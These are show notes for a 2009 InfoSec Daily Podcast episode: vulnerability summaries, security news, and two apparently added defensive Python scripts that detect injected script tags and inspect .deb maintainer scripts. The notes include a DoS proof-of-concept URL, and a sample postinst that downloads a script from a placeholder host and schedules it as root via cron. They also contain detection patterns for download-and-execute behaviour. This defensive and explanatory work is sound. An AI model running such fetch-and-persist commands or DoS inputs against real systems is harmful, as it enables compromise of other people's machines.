2009.12.15

ISD Episode 28

InfoSec Daily Podcast


InfoSec Podcast Episode 28 for December 15, 2009. 

Vulnerabilities of Interest:

  1. SAP AG SAPgui is prone to a remote buffer-overflow vulnerability. Attackers can exploit this issue to execute arbitrary code within the context of an application that uses the ActiveX control (typically Internet Explorer). Failed exploit attempts will result in a denial-of-service condition. SAPgui 6.4 is vulnerable; other versions may also be affected. A working commercial exploit is available through VUPEN Security – Exploit and PoCs Service. This exploit is not otherwise publicly available or known to be circulating in the wild. Proof of concept and exploit code are available in the wild.
  2. Adobe Reader and Acrobat are prone to a remote code-execution vulnerability. An attacker can exploit this issue to execute arbitrary code. Failed exploit attempts will likely cause denial-of-service conditions. This issue affects Adobe Reader and Acrobat versions 9.2 and prior. The issue is being exploited in the wild.
  3. NetFlow Analyzer 7 Professional Plus is subject to a remote looping DoS. ManageEngine NetFlow Analyzer is a traffic analysis and network forensic tool that leverages a wide range of management technologies that are part of Cisco IOS; it is marketed as the only product that supports Cisco NetFlow, Cisco NBAR and Cisco CBQoS. This vulnerability is due to a semicolon (";") input validation error. PoC: http://localhost:8080/;netflow/jspui/dashBoard.do?dId=1
  4. Thunderbird 2.0.0.23 (lib) is subject to a remote array overrun (arbitrary code execution) vulnerability. The main problem exists in the dtoa implementation. Thunderbird has the same dtoa as Firefox, etc. This problem also affects many add-ons for Thunderbird. Thunderbird 2 includes many new features to help you manage your inbox. With Thunderbird 2, it's easier to prioritize and find your important email with tags, and the new find bar helps you find content within your email faster. Lightning brings the Sunbird calendar to the popular email client, Mozilla Thunderbird. Since it's an extension, Lightning is tightly integrated with Thunderbird, allowing it to easily perform email-related calendaring tasks. Proof of concept code is available.

News Items of Interest:

News item 1: http://www.wired.com/threatlevel/2009/12/decaf-cofee/ <Rick>
Our first news article is actually a carry-over from last night. We discussed it in our pregame show with Adrian, but it appears that some hackers may prefer DeCaF to COFEE. While we reference the Wired article on this, there are numerous outlets carrying the story on the new anti-forensics, or more specifically anti-COFEE, tool that was released, called DeCaF (the Detect and Eliminate Computer Assisted Forensics tool). If you loaded it and played with it, you'll see that it monitors for COFEE and for USB usage and, based upon this, allows you to take specific actions such as clearing event logs and running programs; of interest, it also allows you to uninstall torrent clients. We will certainly want to get Rob Lee's take on this when we have him on. You can find the tool here: http://decafme.org/

News item 2:  http://extraexploit.blogspot.com/2009/12/318xcom-and-others-evil-domains.html <Rick>
We talked recently about the 318x.com iFrame issue and the sheer number of compromised websites. Someone over on the Full Disclosure mailing list provided a link to a blog where they analyze 318x.com and the other domains that are serving up the "Eldorado" rootkit dropper. They provide complete links to the analysis of the rootkit as well as the original Google query. The report indicates that the original 318x.com and 3b3.org domains do not appear to be currently active, but what remains is a third domain, z360.net, which at this time is apparently still operating. If you re-run the query on Google, you will see that it now returns about 830K results for z360.net. http://www.google.it/search?hl=en&safe=off&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&hs=Kbr&num=100&q=%22%3Cscript+src%3D%22z360.net%2Fc.js%22%3E%3C%2Fscript%3E%22&btnG=Search&aq=f&oq=
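
As an added illustration for this item (my own code, not part of the original post or of the blog analysis it links), here is a small Python scanner that does locally what the Google query above does at search-engine scale: it parses a page's HTML and reports every `<script src>` whose host is one of the listed domains. The domain list is seeded with the three domains named above (318x.com, 3b3.org, z360.net) and the sample page is constructed for the example. It also accepts the scheme-less src form that appears in the query (`z360.net/c.js`) and protocol-relative forms (`//host/x.js`), which a host-only check would miss.

```python
"""Find <script src> tags that point at listed domains (added example)."""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Domains named in the report above. A real deployment would load a
# maintained blocklist rather than hard-code these.
SUSPECT_DOMAINS = {"318x.com", "3b3.org", "z360.net"}


def script_host(src: str) -> str:
    """Return the host a script src refers to, lower-cased, or "" if none.

    Handles absolute URLs, protocol-relative URLs ("//host/x.js") and the
    scheme-less form seen in the search query above ("z360.net/c.js"),
    whose first path segment is taken as the host candidate when it
    contains a dot. Site-relative paths ("/static/app.js") yield "".
    """
    src = src.strip()
    if src.startswith("//") or "://" in src:
        return (urlsplit(src).hostname or "").lower()
    if src.startswith("/"):
        return ""
    head = src.split("/", 1)[0].split("?", 1)[0]
    return head.lower() if "." in head else ""


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> start tag."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            for name, value in attrs:
                if name == "src" and value:
                    self.sources.append(value)


def find_injected_scripts(html: str, suspect_domains=SUSPECT_DOMAINS):
    """Return [(src, host)] for script tags whose host matches a listed domain or a subdomain of one."""
    parser = ScriptSrcCollector()
    parser.feed(html)
    parser.close()
    hits = []
    for src in parser.sources:
        host = script_host(src)
        if host and any(host == d or host.endswith("." + d) for d in suspect_domains):
            hits.append((src, host))
    return hits


# Constructed sample page: two legitimate includes and two injected ones.
SAMPLE_PAGE = """<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example.org/lib.js"></script>
</head><body>
<p>Hello</p>
<script src="z360.net/c.js"></script>
<script src="//cdn.3b3.org/x.js"></script>
</body></html>"""

if __name__ == "__main__":
    for src, host in find_injected_scripts(SAMPLE_PAGE):
        print(f"injected script: src={src!r} host={host}")
```

This only sees tags present in the HTML as served, so it is meant to run over your own pages (a crawl of your site, or the response bodies in a proxy log), not as a browser-side control: scripts that obfuscated JavaScript inserts at runtime never appear as a static `<script>` tag.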

News item 3: http://www.cultofmac.com/operation-chokehold-is-gathering-steam-bring-att-to-its-knees-on-friday/23418 <Rick>
So you guys have probably heard about the proposal for AT&T, more specifically AT&T iPhone customers, to launch an attack against AT&T in a sort of protest against their substandard network. Called "Operation Chokehold", the proposal is that on Friday, December 18, at noon Pacific time, which is 3 PM EST, they are hoping to overwhelm the AT&T data network and "bring it to its knees". The goal is to have every iPhone user (or as many as we can) turn on a data intensive app and run that app for one solid hour. Send the message to AT&T that we are sick of their substandard network and sick of their abusive comments. The idea is we'll create a digital flash mob. My take on this is that it could prove to be quite interesting from a DoS perspective, obviously impacting not only those trying to make a point, but those that are not. The implications are wide reaching, and I'm not just speaking about the potential impact to emergency services, but most certainly to the reputation of AT&T.

News item 4: http://www.darkreading.com/security/vulnerabilities/showArticle.jhtml?articleID=222001810&cid=RSSfeed <Rick>
I'm not sure if this has gotten as much press as I think it deserves, but it appears that Core Security has added support for attacking wireless networks in a new version of CORE IMPACT. The addition of wireless support lets pen testers utilize man-in-the-middle attacks and crack the encryption in WEP, WPA, and WPA2-encrypted networks. So in version 9 you could just sniff a wireless network; with version 10 you not only see them, but you can attack them.

I see this as a wonderful addition and something that would certainly be useful not only for external pen testers, but internal as well.

News item 5:  http://news.yahoo.com/s/nf/20091214/bs_nf/70595 <Rick>
It appears that Obama is now ready for the US to join United Nations talks on cyberwar and Internet crime. That is not the interesting part of the story; what is interesting is the cybercrime report stating that in 2008, the Internet Crime Complaint Center (IC3) received 275,234 complaints, a 33.1 percent increase from 2007. Attacks cost $264.6 million, up from $239.1 million in 2007.

What is also interesting are the sticking points in these discussions, as it seems that Russia and the U.S. have yet to agree on the criminal investigation components. It seems that Russia wants to protect its sovereignty regarding investigations of internal cyberactivity, while the U.S. wants international help in investigating and defending against cybercrimes. This is really not surprising, since most cyberattacks against U.S. military, business and personal computers are generated from China and Russia.

Of course, we all know about the Russia / Georgia cyberwar.

News item 6: http://www.mxlogic.com/securitynews/web-security/analysts-2010-will-see-surges-in-windows-7-malware-and-application-exploits355.cfm <Rick>
Lavasoft gets our Duh! Award of the day for their prediction that Windows 7 will cause a large-scale shift in the production and distribution of malware. Since malware is overwhelmingly targeted at Microsoft products, they postulate that Windows 7 will require new versions of malware.

Lavasoft also stated that non-Windows operating systems could become targets with the uptick in use of operating systems like Ubuntu, thus making them more viable targets for malware infections. Lavasoft also says that scareware and rogue anti-virus software will continue to be a common type of online scam, bilking victims out of hard cash in return for a bogus product.

Interesting to get their take on things, but this is really more of the same, isn't it?

News item 7: http://digitizor.com/2009/12/10/ubuntu-malware-for-ddos-attack-found-in-screensaver/ <Rick>
Funny that we have a story on a piece of malware that has been found in a .deb file claiming to be a screensaver from Gnome-Look. The malware appears to be an agent for a DDoS attack. This affects Ubuntu and other Debian-based OSes as well. The .deb file in question is supposedly a screensaver of a waterfall. When installed, the "screensaver" installs some scripts with elevated privileges rather than the screensaver that is expected. The script is designed to auto-update itself and potentially to make the infected system take part in a DDoS attack.

The “screensaver” in question has been removed from Gnome-Look now, but it does sort of give credibility to the Lavasoft report.
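
The reason a .deb can "install scripts with elevated privileges" is that dpkg runs the package's maintainer scripts (preinst, postinst, prerm, postrm) as root, before you ever see a screensaver. As an added example for this item (my own code, not from the article or from Gnome-Look), here is a Python inspector that opens a .deb without installing it, pulls those scripts out of its control archive and flags ones that download files, write cron entries, pipe a download into a shell, or set setuid bits. A .deb is an `ar` archive holding `debian-binary`, `control.tar.*` and `data.tar.*`, so the script parses `ar` directly and needs no dpkg on the machine. The sample package is built in memory with a constructed postinst; the update URL in it is a placeholder on the reserved `.invalid` TLD and the patterns are a starting point, not a complete list.

```python
"""Inspect a .deb's maintainer scripts before installing it (added example)."""
import io
import re
import tarfile

AR_MAGIC = b"!<arch>\n"
MAINT_SCRIPTS = ("preinst", "postinst", "prerm", "postrm")

# Behaviours worth a human look in a script that will run as root.
SUSPICIOUS = {
    "downloads code": re.compile(r"\b(wget|curl)\b"),
    "schedules itself": re.compile(r"\bcrontab\b|/etc/cron\."),
    "pipes download to interpreter": re.compile(r"\|\s*(sh|bash|python\S*)\b"),
    "sets setuid bit": re.compile(r"chmod\s+(?:\S*\+\S*s\b|[4-7][0-7]{3}\b)"),
}


def ar_members(data: bytes):
    """Yield (name, bytes) for each member of an ar archive, the .deb container format."""
    if not data.startswith(AR_MAGIC):
        raise ValueError("not an ar archive")
    pos = len(AR_MAGIC)
    while pos + 60 <= len(data):
        header = data[pos:pos + 60]          # fixed 60-byte member header
        if header[58:60] != b"`\n":
            raise ValueError("bad ar member header")
        name = header[0:16].decode("ascii").rstrip().rstrip("/")  # GNU ar appends "/"
        size = int(header[48:58].decode("ascii").strip())
        start = pos + 60
        yield name, data[start:start + size]
        pos = start + size + (size & 1)      # members are padded to even offsets


def maintainer_scripts(deb_bytes: bytes) -> dict:
    """Return {script_name: text} for the maintainer scripts in control.tar.*."""
    scripts = {}
    for name, blob in ar_members(deb_bytes):
        if not name.startswith("control.tar"):
            continue
        with tarfile.open(fileobj=io.BytesIO(blob), mode="r:*") as tar:
            for member in tar.getmembers():
                base = member.name.split("/")[-1]   # control tars use "./postinst"
                if member.isfile() and base in MAINT_SCRIPTS:
                    scripts[base] = tar.extractfile(member).read().decode("utf-8", "replace")
    return scripts


def review_package(deb_bytes: bytes) -> dict:
    """Return {script_name: [matched behaviour labels]} for every maintainer script found."""
    return {
        script: [label for label, rx in SUSPICIOUS.items() if rx.search(text)]
        for script, text in maintainer_scripts(deb_bytes).items()
    }


# --- constructed sample package (for the example only) ---------------------

def build_ar(members) -> bytes:
    """Assemble a minimal ar archive from (name, bytes) pairs."""
    out = bytearray(AR_MAGIC)
    for name, blob in members:
        out += f"{name:<16}{0:<12}{0:<6}{0:<6}{'100644':<8}{len(blob):<10}`\n".encode("ascii")
        out += blob
        if len(blob) & 1:
            out += b"\n"
    return bytes(out)


def build_sample_deb(postinst_text: str) -> bytes:
    """Build an in-memory .deb whose control.tar.gz carries the given postinst."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for fname, text in (("control", "Package: waterfall-screensaver\nVersion: 0\n"),
                            ("postinst", postinst_text)):
            body = text.encode()
            info = tarfile.TarInfo("./" + fname)
            info.size, info.mode = len(body), 0o755
            tar.addfile(info, io.BytesIO(body))
    return build_ar([("debian-binary", b"2.0\n"),
                     ("control.tar.gz", buf.getvalue()),
                     ("data.tar.gz", b"")])


# Constructed postinst modelled on the behaviour described above; not the real malware.
SUSPICIOUS_POSTINST = """#!/bin/sh
set -e
wget -q http://updates.example.invalid/run.sh -O /usr/bin/run.sh
chmod 755 /usr/bin/run.sh
echo "*/5 * * * * root /usr/bin/run.sh" > /etc/cron.d/screensaver-update
"""
CLEAN_POSTINST = "#!/bin/sh\nset -e\nupdate-desktop-database -q || true\n"

if __name__ == "__main__":
    for label, text in (("sample", SUSPICIOUS_POSTINST), ("clean", CLEAN_POSTINST)):
        print(label, review_package(build_sample_deb(text)))
```

To check a real package, read the file into `deb_bytes` and call `review_package` on it; an empty list for every script does not make the package safe, it only means none of these few patterns matched, so the scripts are still worth reading in full for anything outside the distribution's own repositories.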

News item 8: http://money.cnn.com/magazines/moneymag/bestjobs/2009/snapshots/8.html
John Strand posted this link on the Pauldotcom mailing list. Now normally I'm like the anti-callout guy, but I've got some serious issues with this report. My two main issues involve the report grabbing someone in Atlanta that was a convicted hacker as a reference. Secondarily, I have an issue with any security professional calling themselves the "World's Number One Security Expert". I would never refer to anyone that was convicted of a crime as anything.
